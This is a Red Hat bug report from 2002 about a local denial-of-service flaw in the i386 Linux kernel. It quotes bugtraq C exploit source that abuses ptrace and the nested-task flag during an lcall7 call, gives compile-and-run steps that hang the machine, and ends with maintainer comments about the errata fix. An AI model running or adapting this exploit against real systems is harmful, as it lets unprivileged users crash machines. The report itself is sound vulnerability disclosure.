Bug 77834 - Working Dos from bugtraq mailing list
Summary: Working Dos from bugtraq mailing list
Alias: None
Product: Red Hat Linux
Classification: Retired
Component: kernel
Version: 8.0
Hardware: i686
OS: Linux
Target Milestone: ---
Assignee: Arjan van de Ven
QA Contact: Brian Brock
Depends On:
TreeView+ depends on / blocked
Reported: 2002-11-14 07:42 UTC by Leonid Mamtchenkov
Modified: 2007-03-27 03:58 UTC (History)
2 users (show)

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Clone Of:
Last Closed: 2002-11-16 11:06:56 UTC

Attachments (Terms of Use)

System ID Private Priority Status Summary Last Updated
Red Hat Product Errata RHSA-2002:262 0 normal SHIPPED_LIVE : New kernel fixes local denial of service issue 2002-09-23 04:00:00 UTC
Red Hat Product Errata RHSA-2002:263 0 normal SHIPPED_LIVE Important: kernel security update 2002-09-23 04:00:00 UTC

Description Leonid Mamtchenkov 2002-11-14 07:42:49 UTC
Description of Problem:
As was posted on the bugtraq[@securityfocus.com] mailing list:
From: Christophe Devine <DEVINE@iie.cnam.fr>
To: bugtraq@securityfocus.com
Date: Wed, 13 Nov 2002 00:59:09 +0000
Subject: Re: i386 Linux kernel DoS

On Wed, 13 Nov 2002, Stefan Laudat wrote:

> Regarding this issue: is it 80x86 or specifically 80386 designed ?
> Been trying it on AMD Duron, AMD Athlon MP, Intel i586 - just segfaults :(

Yep; the first version of the DoS I posted on bugtraq was defective and
worked only under special conditions (inside gdb for example).

However this updated version works much better:

#include <sys/ptrace.h>

struct user_regs_struct {
        long ebx, ecx, edx, esi, edi, ebp, eax;
        unsigned short ds, __ds, es, __es;
        unsigned short fs, __fs, gs, __gs;
        long orig_eax, eip;
        unsigned short cs, __cs;
        long eflags, esp;
        unsigned short ss, __ss;

int main( void )
    int pid;
    char dos[] = "\x9A\x00\x00\x00\x00\x07\x00";
    void (* lcall7)( void ) = (void *) dos;
    struct user_regs_struct d;

    if( ! ( pid = fork() ) )
        usleep( 1000 );
        (* lcall7)();
        ptrace( PTRACE_ATTACH, pid, 0, 0 );
        while( 1 )
            wait( 0 );
            ptrace( PTRACE_GETREGS, pid, 0, &d );
            d.eflags |= 0x4100; /* set TF and NT */
            ptrace( PTRACE_SETREGS, pid, 0, &d );
            ptrace( PTRACE_SYSCALL, pid, 0, 0 );

    return 1;

At the beginning I thought only kernels <= 2.4.18 were affected; but it
appeared that both kernels 2.4.19 and 2.4.20-rc1 are vulnerable as well.
The flaw seems to be related to the kernel's handling of the nested task
(NT) flag inside a lcall7.

Christophe Devine

This exploit compiles and works on my up2date-ed system with the latest kernel.

Version-Release number of selected component (if applicable):

How Reproducible:

Steps to Reproduce:
1. Save exploit to verybad.c
2. gcc verybad.c -o crash
3. ./crash

Actual Results:
System unresponsive, although pingable.

Expected Results:
Segmentation fault or something.

Additional Information:

Comment 1 Arjan van de Ven 2002-11-14 09:07:28 UTC
yes we know about this; I built packages yesterday and they're in QA now

Comment 2 Arjan van de Ven 2002-11-16 11:06:56 UTC
An errata has been issued which should help the problem described in this bug report. 
This report is therefore being closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files, please follow the link below. You may reopen 
this bug report if the solution does not work for you.


Comment 3 Frederic Hermann 2002-11-18 10:44:15 UTC
This bug affect RedHat Linux 6.2 as well. I ran the program above on an up-to-
date RH6.2 box, as an unprivilegied user, and the box totally hang.

Note You need to log in before you can comment on or make changes to this bug.